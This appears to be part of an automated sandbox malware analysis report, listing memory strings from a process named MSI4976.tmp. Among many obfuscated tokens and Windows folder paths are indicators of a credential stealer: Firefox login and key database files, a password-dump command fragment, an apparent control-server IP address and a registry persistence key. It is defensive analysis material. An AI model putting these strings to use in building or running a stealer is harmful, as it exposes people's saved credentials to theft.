              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p9eh1tt1smemstr_0ae6c965-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o2xb0rg9tg3mmemstr_a152ef86-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g6wb4ua9yj3umemstr_3e53d0fc-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m7da4uw2mw6mmemstr_e5e8dbbc-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p4nd7eh0xmemstr_562ef504-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b6pq2cg7ez9xmemstr_881b5bf0-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o8jf7py6io3kmemstr_82cf5e08-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p2lo0os0kmemstr_73a9fb48-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p3ai1lo6lmemstr_505e593b-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;ptr;ptr;memstr_ce737f6d-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b4dr9dc6ar8hmemstr_aea134d0-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p0ip9jn5zmemstr_98f462fd-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws2_32.dllmemstr_0b8c3206-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p5hp7rk7bb7dskmemstr_0f1bc7b4-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p1mn5cq9b0kmemstr_c7acdcad-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f7bp2gd7nmp6eb1om3zfomemstr_1a0e9e2e-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b2tr4ar3nmemstr_c0328d25-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r6gc8yw6qmemstr_b0f3be3e-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2su2us0ge9q[omemstr_27eefcc1-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o2yu7az0kbomemstr_fcac0128-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o0be5cm0eh0beo*\memstr_c793d36a-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5ty9jp2nmemstr_ac7248f5-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p4lb9fu2rwo$\memstr_6a60fbc4-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ioctlsocket~o?\memstr_b940c8ba-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p4sb7hf1nc5hmemstr_13e72e0f-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g8dv0vm4qmemstr_4ba4574d-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p2gj2we1lmemstr_f89a6283-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2vx8ix2xr2hmemstr_47d2516c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n1vg3zx7vmemstr_25e89606-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g3ky0mn2u$omemstr_90e52907-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p7kz5ud7i/ol\memstr_5a310172-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p3wm6ww5qu9n6og\memstr_0adf88a1-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin2.exe /stext pl2.9o~\memstr_5d0bd326-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \key4.dbmemstr_a9e5e5e2-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r3ju1fa3wm/chememstr_790ac0f0-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n9jz4pp2nmemstr_bb050f23-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o8tq9mx1gq4umemstr_0f0403b2-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p6yv9rm2nm6dmemstr_6c5683d7-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f7bp2gd7num2wp0un5amemstr_01e7a59c-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: firefox.exememstr_fe3e4503-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8rs7jf2ir3qmemstr_b2b39c7e-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrome.exememstr_20e85e91-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /pl2.txtmemstr_b9e8d974-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p7cx1zr8wbjmemstr_2b237ee9-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p3pk3zx6hrofilmemstr_b315b82d-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \cert9.dbmemstr_c294d925-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n8lv2tx6yu1nemmemstr_a84369c7-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p9hc9is9kmemstr_12139ba1-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p1rh2zd8vk5hmemstr_a70aae9a-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2uy0cr1wmemstr_04752362-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2sc6qp6ymemstr_6208c397-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p3hc4op4vmemstr_92b7edc9-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b8sg3ru5zmemstr_6696a59e-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g2zt0rm5jlhmemstr_2cb29827-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e8ea1ym8wwhmemstr_e13bcbce-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windata\^hmemstr_fb9bbb38-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \logins.jsonmemstr_e3e9f512-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r3vc9kk7qj5whh)_memstr_002be916-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p8tj3rn0wr5smemstr_6be7bfc3-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wmplayer.exe3quran.netzh;_memstr_536e4e22-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /vyzspq.lnk}h2_memstr_236e41b8-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g5xu5ii6pmemstr_aa492c6c-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e9rx3fn9mf7xmemstr_30fc46a7-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svwin1.exememstr_fc8ceee4-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e7zl6et4ph2lmemstr_1525f5ec-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g4vf3zs1q+hh_memstr_253c652d-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e6xd9xr7g2hc_memstr_ef0cdc80-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b0yo7wp3e5hz_memstr_d8c77fa4-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows defender<h}_memstr_73d01560-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemdefaultpathparsermemstr_d35b6809-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p9mn3jt5imemstr_b85fa22e-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p0bt9nb0kf8dmemstr_66984b5c-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 172.111.138.100vcmemstr_17b5ea75-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o6vs6pg1qmemstr_1a4200be-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "swbemprivilegesetr2memstr_b92b58ed-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p3zz8xp9ic6apcmemstr_de7fa50a-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o5cy6rz5vmemstr_ceb1e51a-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swbemservicesexr2omemstr_f298666c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b5ok6ax1pw1iaimemstr_341c0348-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r4xi9ox1thimemstr_43ee2000-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o7ke1sa7gd6csimemstr_af347cf7-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o3tc9tk3wzimemstr_69023f2e-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemdefaultpathparserdimemstr_9eb5c1cd-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32memstr_36691b99-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p1gl3mf7acyi>^memstr_bca90064-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2nt5si4ld0amemstr_4205051c-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\installer\msi4976.tmpmemstr_97dbeeee-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\installer\msi4976.tmp1if^memstr_ae4f90db-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lmem memstr_c8123407-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: negoextenderlmem memstr_f97083f6-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m5bz1jb5rh8mmemstr_05b26b57-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localappdata=c:\users\user\appdata\localmemstr_43916aee-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p8xq5ty9umemstr_3c6f1ea1-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfiles(x86)=c:\program files (x86)memstr_57e3d383-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p7zq9ti1ap9u|memstr_f958b543-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p0wl6gm6fmemstr_01284d01-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows defendermemstr_9225ba8f-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p1tq0ev4xw2smemstr_f612462a-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfiles(x86)=c:\program files (x86)djmemstr_a32fad4d-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\software\win32|vjmemstr_aacfdc43-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n6nx9ci0myjmemstr_b37e6580-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kj(q#memstr_4e7c5dcc-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\musicrj#q$memstr_25039dfb-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uj:q%memstr_79c94547-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |j=q&memstr_ccfc92e5-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *jkq,memstr_3a73c015-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videos-jbq-memstr_809daab6-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hj(5w<memstr_1810355f-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4jeq.memstr_b47689e1-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?j|q/memstr_c0804c29-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\desktopmemstr_5e81f4a0-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bs1rp8amemstr_e3e91a88-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\desktop.inimemstr_1f1c286b-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\picturesmemstr_1e2086ed-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p3gj2cn5ri5d25memstr_b3d359a6-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloadsmemstr_811aa568-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documentsmemstr_cdcdc5f0-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: known folder managermemstr_1ee3b08e-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_709bc387-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programfilescommonx86rkmemstr_4111b27b-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nk/phmemstr_f4c34bb0-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qk&pimemstr_eb6ee87c-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xk9pjmemstr_4928578e-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrivememstr_8a99464d-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\searchesmemstr_be0bff9d-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )knpqmemstr_73c29bb8-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0kaprmemstr_3ece1ed7-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ncacn_np;kxpsmemstr_79e9a449-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savedpictureslibrarymemstr_a1f0e159-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\contactsmemstr_a43eca18-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userprogramfilescommonmemstr_be0ffc48-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userslibrariesfoldermemstr_4fbcd9a6-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcesdirmemstr_c19170a0-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: publicaccountpicturesmemstr_26cbc52d-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: administrative toolsmemstr_1c0524c2-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: device metadata storememstr_8626b7a0-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appmodsgdmemstr_64d35046-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: searchtemplatesfolderndmemstr_24dcd694-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documents.library-msqdmemstr_d1dece56-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: implicitappshortcutsjd+slmemstr_63b8a5d3-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: md"smmemstr_77c56f89-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: td%snmemstr_d17eccf1-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites"dmemstr_79d90132-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: application shortcuts%djsumemstr_a49e1432-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g3xj3iu4ds,dmsvmemstr_8bbf26a3-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addnewprogramsfolder7ddswmemstr_ec52fd1b-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cameraroll.library-ms>dmemstr_2a7bdfb4-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\linksmemstr_37dd0fc2-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: implicitappshortcutsmemstr_5fcc0534-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recordedtv.library-msmemstr_9b550807-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\musicmemstr_e3b6e841-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\musicjememstr_8d1a87d8-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\pictures_ememstr_5de4f363-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videosmemstr_9c009e8b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\music!ememstr_1c9c0a1a-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\desktop3e`rmemstr_fe40d708-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]/qnnmemstr_b5c81a4f-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32memstr_fe9d0a3c-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\program files (x86)memstr_68111e05-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64memstr_6ce5e750-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\program files (x86)ef*umemstr_12933cbe-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\public\videos~f?umemstr_8a54bcfd-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j9*`+memstr_2da89a14-a
